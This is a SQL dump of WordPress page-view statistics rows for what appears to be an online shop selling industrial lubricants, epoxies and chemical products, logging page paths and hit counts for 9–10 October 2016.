INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-09', 3, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-3000/', '2016-10-09', 2, 968); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-09', 2, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-09', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-09', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-09', 1, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-470c/', '2016-10-09', 3, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-465c/', '2016-10-09', 2, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-09', 3, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-09', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-09', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-09', 2, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-09', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-09', 2, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-09', 2, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-09', 2, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-09', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-09', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-09', 2, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-09', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-09', 2, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-09', 2, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-09', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-09', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-09', 2, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-09', 2, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-09', 3, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-09', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements/', '2016-10-09', 2, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/', '2016-10-09', 2, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-09', 2, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472c/', '2016-10-09', 2, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-09', 3, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-09', 2, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroextreme-dental-lubricant/', '2016-10-09', 3, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-coatings/', '2016-10-09', 2, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-09', 2, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milsolv-medical-solvents/', '2016-10-09', 2, 473); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/millube-perfluorinated-synthetic-lubricants/', '2016-10-09', 2, 468); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/', '2016-10-09', 2, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64/', '2016-10-09', 2, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/', '2016-10-09', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/', '2016-10-09', 2, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-09', 2, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-10-09', 2, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-09', 2, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/shieldsys-rfi-nickel-conductive-coating/', '2016-10-09', 2, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-09', 2, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-09', 2, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/', '2016-10-09', 2, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-09', 2, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/', '2016-10-09', 2, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/', '2016-10-09', 2, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/', '2016-10-09', 2, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/', '2016-10-09', 3, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-09', 2, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-09', 2, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-09', 2, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/', '2016-10-09', 2, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-10-09', 2, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/', '2016-10-09', 2, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/', '2016-10-09', 2, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-09', 4, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-09', 2, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a5/', '2016-10-09', 2, 1012); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-09', 2, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/agl-683/', '2016-10-09', 2, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/', '2016-10-09', 2, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122se/', '2016-10-09', 2, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-09', 6, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/', '2016-10-09', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828', '2016-10-09', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/', '2016-10-09', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/?wc-ajax=get_refreshed_fragments', '2016-10-09', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/', '2016-10-09', 2, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-09', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-09', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-09', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/?add_to_wishlist=954', '2016-10-09', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/?add_to_wishlist=944', '2016-10-09', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/?add_to_wishlist=943', '2016-10-09', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?add_to_wishlist=944', '2016-10-09', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/?add_to_wishlist=954', '2016-10-09', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/', '2016-10-09', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/?add_to_wishlist=943', '2016-10-09', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-09', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/?add_to_wishlist=847', '2016-10-09', 1, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-222/', '2016-10-09', 1, 846); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/?add_to_wishlist=714', '2016-10-09', 1, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/?add_to_wishlist=848', '2016-10-09', 1, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/?add_to_wishlist=672', '2016-10-09', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-acx/', '2016-10-09', 2, 674); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?add_to_wishlist=439', '2016-10-09', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?add_to_wishlist=440', '2016-10-09', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-09', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?add_to_wishlist=788', '2016-10-09', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-09', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/?add_to_wishlist=821', '2016-10-09', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-212/', '2016-10-09', 1, 819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/?add_to_wishlist=1014', '2016-10-09', 1, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a6/', '2016-10-09', 1, 1015); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/?add_to_wishlist=713', '2016-10-09', 1, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/?add_to_wishlist=717', '2016-10-09', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/?add_to_wishlist=715', '2016-10-09', 1, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?add_to_wishlist=789', '2016-10-09', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?add_to_wishlist=822', '2016-10-09', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-216/', '2016-10-09', 1, 823); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a5/?add_to_wishlist=1012', '2016-10-09', 1, 1012); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a3/', '2016-10-09', 1, 1011); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-09', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-09', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-09', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/', '2016-10-09', 1, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-220/', '2016-10-09', 1, 410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-221/', '2016-10-09', 1, 843); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/', '2016-10-09', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-09', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-210/', '2016-10-09', 1, 402); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-211/', '2016-10-09', 1, 818); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-217/', '2016-10-09', 1, 824); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/', '2016-10-09', 1, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a1/', '2016-10-09', 1, 1009); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a2/', '2016-10-09', 1, 1010); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a7/', '2016-10-09', 1, 1016); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a0/', '2016-10-09', 1, 992); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a1/', '2016-10-09', 1, 993); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a2/', '2016-10-09', 1, 995); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a4/', '2016-10-09', 1, 997); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a5/', '2016-10-09', 1, 998); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a6/', '2016-10-09', 1, 999); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a7/', '2016-10-09', 1, 1001); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-1000/', '2016-10-09', 1, 708); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-500/', '2016-10-09', 1, 707); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?add_to_wishlist=790', '2016-10-09', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/?add_to_wishlist=790', '2016-10-09', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/', '2016-10-09', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-09', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fpg-182-copy/', '2016-10-09', 1, 984); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fpg-182/', '2016-10-09', 1, 973); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pca/', '2016-10-09', 1, 1428); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pro/', '2016-10-09', 1, 1435); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-sg/', '2016-10-09', 1, 1431); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/?add_to_wishlist=1072', '2016-10-09', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/agl-683/?add_to_wishlist=1072', '2016-10-09', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-09', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-09', 1, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/', '2016-10-09', 1, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143aa/', '2016-10-09', 1, 579); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ab/', '2016-10-09', 1, 581); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/', '2016-10-09', 1, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ad/', '2016-10-09', 1, 583); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ay/', '2016-10-09', 1, 580); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143az/', '2016-10-09', 1, 452); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?add_to_wishlist=989', '2016-10-09', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/?add_to_wishlist=1077', '2016-10-09', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/', '2016-10-09', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-09', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ac/', '2016-10-09', 1, 647); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ad/', '2016-10-09', 1, 648); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250az/', '2016-10-09', 1, 646); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-280ab/', '2016-10-09', 1, 649); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-280ac/', '2016-10-09', 1, 651); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283aa/', '2016-10-09', 1, 653); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ab/', '2016-10-09', 1, 654); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ac/', '2016-10-09', 1, 655); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ad/', '2016-10-09', 1, 656); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283az/', '2016-10-09', 1, 652); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/', '2016-10-09', 1, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-09', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-467c/', '2016-10-09', 1, 734); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-475c/', '2016-10-09', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-477c/', '2016-10-09', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-114c/', '2016-10-09', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-252n/', '2016-10-09', 1, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/', '2016-10-09', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-462h/', '2016-10-09', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-470s-12-oz-aerosol/', '2016-10-09', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/', '2016-10-09', 1, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/', '2016-10-09', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-5003-w-55/', '2016-10-09', 1, 1033); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-5522-wy-55/', '2016-10-09', 1, 1035); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-wd-510/', '2016-10-09', 1, 1042); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3015/', '2016-10-09', 1, 1067); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3030/', '2016-10-09', 1, 1164); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3046/', '2016-10-09', 1, 1166); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3055/', '2016-10-09', 1, 1168); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-10-09', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-09', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3155/', '2016-10-09', 1, 1065); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3155-2/', '2016-10-09', 1, 1178); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-09', 1, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-09', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-09', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3245/', '2016-10-09', 1, 1187); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3253/', '2016-10-09', 1, 1865); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/', '2016-10-09', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3271/', '2016-10-09', 1, 1189); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3274/', '2016-10-09', 1, 1191); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3290/', '2016-10-09', 1, 1198); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3295/', '2016-10-09', 1, 1209); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3370/', '2016-10-09', 1, 1061); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-09', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/', '2016-10-09', 1, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/', '2016-10-09', 1, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58034/', '2016-10-09', 1, 994); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1163/', '2016-10-09', 1, 1019); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-x-si/', '2016-10-09', 1, 2344); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-10', 594, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-10', 146, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-10', 47, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-10', 99, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-10', 6, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/', '2016-10-10', 1, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-10', 10, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/', '2016-10-10', 12, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-10', 5, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-10', 3, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-10', 14, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-10', 30, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-10', 8, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-10', 45, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n', '2016-10-10', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/', '2016-10-10', 3, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/?wc-ajax=get_refreshed_fragments', '2016-10-10', 2, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-10', 11, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143xd/', '2016-10-10', 4, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-10', 15, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-10', 28, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-10', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-10', 2, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-10', 31, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-10', 2, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/%20chemical%20-products', '2016-10-10', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/%20chemical%20-products/', '2016-10-10', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/', '2016-10-10', 1, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-10', 10, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3274/', '2016-10-10', 1, 1191); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3274/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1191); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-10', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-10', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-10', 4, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-10', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-10', 7, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-10', 5, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-10', 1, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-10', 4, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-10', 3, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-10', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-10', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-10', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-10', 2, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-10', 3, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-10', 3, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-10', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-10', 3, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-10', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-10', 7, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-10', 5, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements/', '2016-10-10', 2, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/', '2016-10-10', 2, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-10', 4, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-10', 3, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-10', 7, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-10', 9, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-10', 5, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/1102/', '2016-10-10', 1, 1102); 
